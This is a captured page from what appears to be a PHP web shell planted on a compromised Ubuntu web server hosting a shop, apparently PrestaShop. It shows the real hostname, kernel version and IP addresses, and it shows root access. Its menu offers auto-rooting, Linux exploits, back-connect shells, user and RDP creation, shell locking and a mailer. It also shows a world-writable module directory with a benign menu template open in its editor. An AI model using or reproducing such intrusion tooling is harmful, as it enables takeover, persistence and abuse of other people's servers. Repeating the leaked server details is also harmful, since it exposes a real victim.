Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
modules /
ps_mainmenu /
[ HOME SHELL ]
Name
Size
Permission
Action
translations
[ DIR ]
drwxrwxrwx
views
[ DIR ]
drwxrwxrwx
config.xml
468
B
-rwxrwxrwx
config_es.xml
532
B
-rwxrwxrwx
index.php
1.24
KB
-rwxrwxrwx
logo.png
3.46
KB
-rwxrwxrwx
ps_mainmenu.php
57.88
KB
-rwxrwxrwx
ps_mainmenu.tpl
828
B
-rwxrwxrwx
ps_menutoplinks.class.php
5.23
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ps_mainmenu.tpl
{function name="menu" nodes=[] depth=0} {strip} {if $nodes|count} <ul data-depth="{$depth}"> {foreach from=$nodes item=node} <li class="{$node.type}{if $node.current} current{/if}"> <a href="{$node.url}" {if $node.open_in_new_window} target="_blank" {/if}>{$node.label}</a> <div> {menu nodes=$node.children depth=$node.depth} {if $node.image_urls|count} <div class="menu-images-container"> {foreach from=$node.image_urls item=image_url} <img src="{$image_url}"> {/foreach} </div> {/if} </div> </li> {/foreach} </ul> {/if} {/strip} {/function} <div class="menu"> {menu nodes=$menu.children} </div>
Close